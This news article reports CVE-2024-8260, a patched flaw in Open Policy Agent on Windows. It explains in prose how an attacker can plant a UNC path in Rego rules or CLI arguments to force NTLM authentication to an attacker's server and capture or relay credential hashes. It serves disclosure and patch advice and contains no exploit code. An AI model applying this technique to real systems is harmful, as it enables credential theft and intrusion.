Attackers Could Exploit Flaw to Relay Credentials, Compromise Systems
A now-patched security flaw in one of the most popular tools for managing security policies could enable attackers to siphon off sensitive credentials from millions of users.
See Also: Gartner Guide for Digital Forensics and Incident Response
Security reasearchers at Tenable uncovered the flaw, CVE-2024-8260, which could expose the credentials of Windows systems running Styra's Open Policy Agent. Tenable assigned a CVSS score of 6.1 to this vulnerability, making it a medium-severity risk.
Styra fixed the issue in the latest release of OPA (v0.68.0). All older instances of OPA running on Windows are vulnerable and should be patched. Organizations that deploy the OPA CLI or the OPA Go package on Windows should update to the latest version.
The flaw enables an attacker to exploit OPA by sending a malicious command that tricks it into authenticating with a remote server controlled by the attacker. During this process, NTLM credentials - passwords used for logging into the machine - can be leaked.
The vulnerability can be exploited as part of post-compromise activities. After an attacker establishes a foothold in the system, potentially through social engineering tactics such as tricking a user into executing OPA via a malicious file attachment in a phishing email. Once inside the system, attackers can exploit the vulnerability by directing the compromised environment to connect to their server using a Universal Naming Convention path. A UNC path is a standard format for identifying the location of resources on a network, typically appearing as servernamesharename. The attacker can use the UNC path to trick the system into attempting to access a malicious server.
To carry out this exploit, the attacker might use Rego rules, which are specific policy statements written in the policy language of OPA. These rules can be manipulated to include the UNC path, steering the OPA to communicate with the attacker's server.
The attacker can also manipulate command-line interface arguments - inputs provided when running OPA - by including the UNC path in those arguments. This combination of techniques enables attackers to exploit the vulnerability, facilitating the unauthorized exposure of sensitive credentials during the authentication process.
"When a user or application attempts to access a remote share on Windows, it forces the local machine to authenticate to the remote server via NTLM. During this process, the NTLM hash of the local user is sent to the remote server," said Tenable researchers.
"Attackers could relay the leaked authentication or use these credentials to break into other systems."
Exploiting the OPA vulnerability is not straightforward. It requires either local access to the target server or the successful execution of code through social engineering tactics or the exploitation of another vulnerability. But the likelihood and ease of exploitation significantly increase if the vulnerable OPA server accepts inputs from users or third parties, particularly if the affected platform is internet-facing.
Many organizations are using OPA to enforce security policies across their cloud-native applications, which often require dynamic input to function effectively, so OPA servers are likely to accept inputs from users or third parties. In this scenario, attackers may find it easier to abuse the vulnerability.